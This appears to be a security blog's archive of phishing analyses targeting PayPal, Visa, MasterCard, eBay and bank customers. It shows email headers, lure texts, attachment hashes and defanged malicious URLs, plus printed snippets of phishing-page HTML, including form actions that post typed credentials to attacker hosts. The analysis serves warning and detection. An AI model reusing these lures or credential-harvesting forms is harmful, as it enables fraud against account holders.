Tag Archives: phishing

Phishing: Attention ! Votre compte PayPal a ete limite

New phishing email used to spread HTML files with fake PayPal login forms:

Phishing Email

Header details:

Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153])
Received: by ns3.komvos.gr (Postfix, from userid 48)
Subject: Attention ! Votre compte PayPal a été limité !
From: Service Paypal
Date: Mon,  4 Jun 2012 13:00:12 +0300 (EEST)
Content-Disposition: attachment; filename="Informations Compte Paypal .zip"

There is a ZIP file attached:

File: Informations Compte Paypal .zip
Dimensione: 5391 bytes
MD5: 2C573252C917A4E4FFC2138E48B50F2B
SHA1: 28B36A51D9215F143AC449984A27A74D520679B7
SHA256: 5E45F7E1988AE2F1B8721226D88AB7DD9EB8A395FB4C501E145554F49655C8C9
SHA384: EE4D4201B65716A986162D43F289FA695263B9BC3EB839F08F185F2B1A1DEC777C68439D91C068DAA80768712B53D80E
SHA512: BA111FCB751F40837E58F50F76314380E8D52FD97B5E98F7855D813433C8FFCDDD26AF58DEE7894F4BC4D2AF53760268FBE25C650FCDC55B0796F6D316E5147A

The extracted file is a .HTML file:

File: Informations Compte Paypal .html
Dimensione: 22525 bytes
MD5: 0500506DEDA37FBC1A7CD19C22173764
SHA1: AB7F78D2A70460418E858E4783F5D3F5376CF2E2
SHA256: F81D8AAA2996D7FB13320FD6F05C37AA1A1CD7BA7BCD29823B03731ED3A067E2
SHA384: 7EEA087DEEEE72203E81F7F606CDAD90F4F5EB1233A95DC692556AFE6AA5B94426E7B84881101F21BF84730B0E132EE3
SHA512: 0B858A75C10EBDBFC9A6D7CDE4C1AB34199B67A51999AB59E85086182C93EF66C20956BA62E68647C27B91704D5A2D4E2EA68749C77ED39DF4AB1F679245BE18

From this HTML code:

<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()">

We can see that the sensitive data of the form is sent to:

hxxp:// byrongoldworks .com /mainbody.php

Report from URLVoid:

URLVoid Report for byrongoldworks .com

Phishing: A causa del nostro recente aggiornamento. Verified by Visa

We have logged other phishing emails used to steal details of Visa users:

From - Mon Apr 23 16:04:50 2012
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
Date: Mon, 23 Apr 2012 15.21.34 +0200
To: undisclosed-recipients:;

Note from the email header the source of the message:

Received: from ser.just3d.tv (unknown [91.227.127.33])

It has nothing to do with Visa, and note also the emails:

Reply-To: sicurela@visaltalia.it

See the visaltalia.it is a l and not an i.

The message of the email:

Gentile Cliente, 
A causa del nostro recente aggiornamento sui nostri server 
(23/04/2012) e necessario aggiornare il tuo profilo. 
Per una maggiore sicurezza e di accesso, si prega di compilare il 
modulo allegato. 
 
Vi ringraziamo della vostra collaborazione. 
 
Copyright Visa Europe 2012. Tutti i diritti riservati

There is also an attached file named visaitalia.html:

File: visaitalia.html
Size: 20015 bytes
MD5: 2C76E9F667E78C8C32C09DBE1129969E
SHA1: 0A30FFC20AC311AF2831086D4B181E0F23483399
SHA256: 1757C6A066E61F1B3E9782570712641FC734E1C6ACCD1DA329F3B10B164136CC
SHA384: BD80E5B8A83A3C00D72B6367421AE85CC6A1FF8981F43D0D6784B52D0AAE58B22DD74293BD8735C8B0E4331C8CCCDA02
SHA512: 4B82AC139180E6B19C58A553456BBE30CE155E22A695E300115CAC5C8BDB3F84A024CCDF104E280162B0C44AF1495C850CA3565533DE62EC6F14EF7754295A30

The attached file contains the form used to send the typed details to a remote link. Listed below there are few malicious links extracted from the HTML attached file:

hxxp:// leonidasvancouver .com /admin/plm/plm.html
hxxp:// rottenfish .de /vbv/plm_files/Logo-Mastercard_Secure_Code.gif
hxxp:// rottenfish .de /vbv/plm_files/fin_VerifiedByVisa_186x79.gif
hxxp:// rottenfish .de /vbv/run.php

The malicious websites are classified as detected in URLVoid:

http://www.urlvoid.com/scan/rottenfish .de/
http://www.urlvoid.com/scan/leonidasvancouver .com/

Phishing: Votre carte bancaire est suspendue

Another email containing malicious URL used for phishing attack against MasterCard and Visa users:

Return-Path: <services@security.com>
Received: from mailrtr1.deltacom.net (mailvip.deltacom.net [72.243.252.244])
Received: from User ([66.0.110.18]) by mailrtr1.deltacom.net (MOS 4.1.10-GA)
From: "visaeurope"<services@security.com>
Subject: Votre carte bancaire est suspendue
Date: Sun, 7 Aug 2011 00:12:08 -0500
To: undisclosed-recipients:;

Email message:

Bonjour clients de visa carte,
 
Votre carte bancaire est suspendue, parce que nous avons rencontre un probleme sur votre diagramme.
Nous avons determine qu'une personne doit peut-etre utiliser votre diagramme sans votre autorisation.
Pour votre protection, nous avons suspendu votre compte bancaire a travers votre carte de credit. Pour soulever cette suspension,
 
Cliquer ici
et suivre le procede indique pour mettre a jour votre compte par la carte de credit.

Malicious URL:

hxxp:// jinwonyc.startlogic. com/vbv/visaeurope.fr/europ-pay/visaeurope/securite/login.aspx/

URLVoid Analysis:

http://www.urlvoid.com/scan/jinwonyc.startlogic.com

Phishing: New Unpaid Item Message from jxavier14: #14027471062

Phishing attack against eBay users:

Return-Path: <aw-confirm@mail.aby.fr>
Received: from mail.ktmtalk.com (mail.ktmtalk.com [173.74.246.25])
Received: from User [98.175.62.124] by mail.ktmtalk.com with ESMTP
Reply-To: <aw-confirm@mail.aby.fr>
From: "eBay Member jxavier14"<aw-confirm@mail.aby.fr>
Subject: New Unpaid Item Message from jxavier14: #14027471062 -- response required
Date: Sat, 6 Aug 2011 06:34:47 -0500
To: undisclosed-recipients:;

Email message:

Dear member,
 
eBay member charly1 has left you a message regarding item #14020078062
 
View the dispute thread to respond.

The malicious URL points to:

hxxp:// newcastlelimo .net/ebay-fr/eBayISAPI.dll.htm

Image of the phishing page:

Image

Note that the connection is NOT secure and does not use SSL (HTTPS)…

URLVoid Analysis:

http://www.urlvoid.com/scan/newcastlelimo.net
This entry was posted in Phishing and tagged , , , on by .

Phishing: Your Paypal Account Will Be Limited

New phishing email related to PayPal accounts:

Return-Path: <servviice@paybal.com>
Received: from WIN-ATAF5I4OOP1 (unknown [96.44.188.43])
Received: from User ([127.0.0.1]) by WIN-ATAF5I4OOP1
From: "Paypal"<servviice@paybal.com>
Subject: Your Paypal Account Will Be Limited
Date: Tue, 17 May 2011 18:38:40 -0700
To: undisclosed-recipients:;

Message:

Image

Note that the email come from:

From: "Paypal"<servviice@paybal.com>

The domain paybal.com is parked!

Malicious URL that redirects to the phishing PayPal login page:

hxxp://www.doncastersc.vic.edu .au/calendar/paypal.secure.update.service/paypal.secure.login/safe.login.process/language&id=en/80a13c0db1f1ff80d546411d7f8a8350c132bc41e0934c/us/webscr.php?cmd=_login-run&dispatch=3885d80a13c0db1f1ff80d546411d7f8a8350c132bc0

URLVoid domain analysis:

http://www.urlvoid.com/scan/paybal.com
http://www.urlvoid.com/scan/doncastersc.vic.edu.au

Phishing: Urgent – Your bank card has been blocked

An user has reported us a suspicious email:

Image

Headers:

Received: from sds-16.hosteur.com (sds-16.hosteur.com [217.16.9.166])
Received: from www-data by sds-16.hosteur.com with local (Exim 4.69)
Subject: URGENT - Your bank card has been blocked
From: Banking Service <bankservice@service.fr >
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: www-data <www-data@hosteur.com>

The clickable link “Access to your form” redirects to a new (suspicious) URL:

hxxp://servicevbv.us. tf/

Image

URLVoid report:
http://www.urlvoid.com/scan/servicevbv.us.tf

Report 2011-04-07 16:38:44 (GMT 1)
Website servicevbv.us.tf
Domain Hash 91fa19172a89f4c10b8dc0ca8b0460ec
IP Address 188.40.70.27
IP Hostname static.27.70.40.188.clients.your-server.de
IP Country DE (Germany)
AS Number 24940
AS Name HETZNER-AS Hetzner Online AG RZ
Detections 2 / 22 (9 %)
Status SUSPICIOUS

Analyzing the URL content, we can see suspicious code:

<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://www.adboost.com/index6.php" frameborder="0" width="486px" height="60px" ></iframe>
<iframe src="hxxp://krystalweb.co.uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php" name="fid1" id="fid1" width="100%" height="100%" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<a href="servicevbv.us.tf">service verified by visa</a>

Why suspicious ?

1) The page title looks like a scam
2) Why CSS style is located in the directory “/zzz/css.css” ?
3) Why Google Analytics (?) code is located in the directory “/zzz/gas.js” ?
4) Why there is an iframe related to adboost. com/index6.php ?
5) Why there is another iframe realted to (long URL) krystalweb. co. uk ?
6) Where is SSL ?

The long URL:

hxxp://krystalweb.co. uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php

Loads the fake form where an user should insert his details. The form will then send (POST) the details to another script that is located in another (suspicious) URL:

action="hxxp://shopkasa.com. br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>

URLVoid analysis:
http://www.urlvoid.com/scan/shopkasa.com.br

Recent Phishing Emails Against Banks and CartaSi

Here are few recent malicious links reported to be phishing pages:

Phishing Page

merklin-baiersbronn. de/components/com_mailto/Bankline.php
mooyekindmakelaars. nl/components/com_contact/Bankline.php
linebanks.dominiotemporario. com/inTerneT/nett/
mellylog.altervista. org/templates/beez/REAL.php
mellylog.altervista. org/templates/beez/Santander.php
163.30.82.2 /~user/www.cartasi.it/index.html
66.7.192.115 /~account/CaraSi.it/gtwpages/index.php?id=
organamattress.com /www/bancodesio/index.html

Malicious Redirect

URLVoid reports:

merklin-baiersbronn. de81.169.145.158
mooyekindmakelaars. nl77.94.248.181
linebanks.dominiotemporario. com187.17.98.37
mellylog.altervista. org – –
163.30.82.2
66.7.192.115 – bored1.reallybored.net
organamattress. com67.15.55.238